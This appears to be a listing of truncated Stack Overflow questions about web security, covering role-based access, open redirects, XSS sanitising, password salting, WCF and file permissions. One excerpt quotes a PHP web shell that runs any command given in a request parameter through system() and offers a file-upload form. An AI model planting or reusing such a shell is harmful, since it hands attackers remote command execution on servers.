In ASP.NET, what's the best way to do the following:
1. Show certain controls based on your rights?
2. For a GridView control, how do you show certain columns based on your role?
I'm thinking for number 2, have the data come from a role-specific view on the database.
...
I've got a website that has Windows authentication enabled on it. From a page in the website, the users have the ability to start a service that does some stuff with the database.
It works fine for me to start the service because I'm a local admin on the server. But I just had a user test it and they can't get the service started.
My qu...
A very well-known major drawback of using CGI is poor web server performance. But how secure are CGI (mainly C/C++) based applications? Are there any major security holes in CGI architecture built on C/C++?
I would like to know some real life implementations of CGI based web apps/web sites. One that I know of is javaranch.com.
...
I am currently enrolled in an information security class and have, thus far, been unimpressed by our assigned textbook. After doing a quick check at Amazon for other security texts, a common complaint amongst reviewers was that their books offer a cursory, entirely theoretical look at hacking and defense with no real world examples.
I'...
I have a webpage that redirects to another webpage like this:
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come ...
I have a database for a web application that is home to some personal information about my users.
What should I do to make sure the data is secure?
Encrypting the data makes sense, of course... but what about stopping somebody from getting on the machine to begin with?
What do I do about the developers that need access to the data, to...
In a normal web app w/ login and secure data, what is an easy way to secure that data and prevent it from being seen by using the browser's back button, once a user logs out?
...
I've recently gotten my hobby java project embedded into a page thanks to this very site, but now I'm having some security issues.
I have the include:
import java.sql.*;
and the line:
Class.forName("com.mysql.jdbc.Driver").newInstance();
as well as a mysql .jar file in my src directory, it works from the console, and in the applet...
So I was wondering if there are any major differences between the various implementations of the hash algorithms; take the SHA series of algorithms, for example. All of them have 3 implementations each, 1 in managed code and 2 wrappers around different native crypto APIs, but are there any major differences between using any of them? I ca...
I am trying to construct a way to keep certain hard drive partitions/USB drives from being accessed for security reasons (protecting intellectual property). I was thinking that when Windows attempts to access the "locked down drive/USB" the attempt is halted and returns something like "drive inaccessible" or something. It's just an ide...
Hello,
I have been tasked to implement a WCF service that makes use of NetMsmqBinding. I wrote the service and it works fine. The problem is that in the last minute they told me that there will be no Active Directory integration. So I don't know how to configure the security of the service. There is a VPN tunnel between the service's an...
The requirements for my document management system were:
Must be secure from theft by simple copying of directories, files etc.
Must be secure against traditional virus infection (infection of physical file)
Must be fast to retrieve
The repository must not be visible to casual (directory) browsing users etc.
I have decided to store a...
This is an extension of my earlier XSS question.
Assuming that there isn't a regex strong enough to guarantee XSS safety for user-entered URLs, I'm looking at using a redirect.
(Although if you do have one please add it under the other question)
We have user input web addresses, so:
stackoverflow.com
They want a link to appear fo...
At about 24:20 in Stack Overflow Podcast 26 Joel Spolsky said there are services that mail postcards with codes for address verification.
Spolsky: You know what we could have badges for? We could have badges for like: "Real Address". Like I have proven that you live at a certain address.
Atwood: We could.
Spolsky:...
I'm working on a web app project (in Java; not that it matters) and we have a form with drop-down lists and input fields, etc.
Obviously drop-down lists are provided because we expect a specific value from a set of values.
So my question is this: does it make sense to ensure the submitted value is in the set of expected values? ...
At work we have two competing theories for salts. The products I work on use something like a user name or phone number to salt the hash. Essentially something that is different for each user but is readily available to us. The other product randomly generates a salt for each user and changes each time the user changes the password. ...
A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<?php
if(isset($_REQUEST['upload'])){
echo '
<form enctype="multipart/form-data" action=".config.php?send" method="PO...
What is the best solution to sanitize output html in rails (to avoid XSS attacks)?
I have two options: the white_list plugin or the sanitize method from Sanitize Helper http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html? For me, until today the white_list plugin worked better, and in the past Sanitize was very buggy, but as...
Hi there,
Is the ASP.NET membership system used over WCF (transport security turned on) enough for high-security internet scenarios with thousands of clients spread all over the internet?
I'm just evaluating possible solutions and wanted to know if this might fit in this category.
If not, what would be the best method to provide high ...
I am trying to create a file in the /tmp directory (working on Linux Ubuntu 7.10) that has read/write/execute access for any user. So I am using the "open(fileName,O_CREAT|O_RDWR,0777)" function to create the file (from a C program) in the user1 account, and I would like user2 to be able to write to the specific file.
However, when I chec...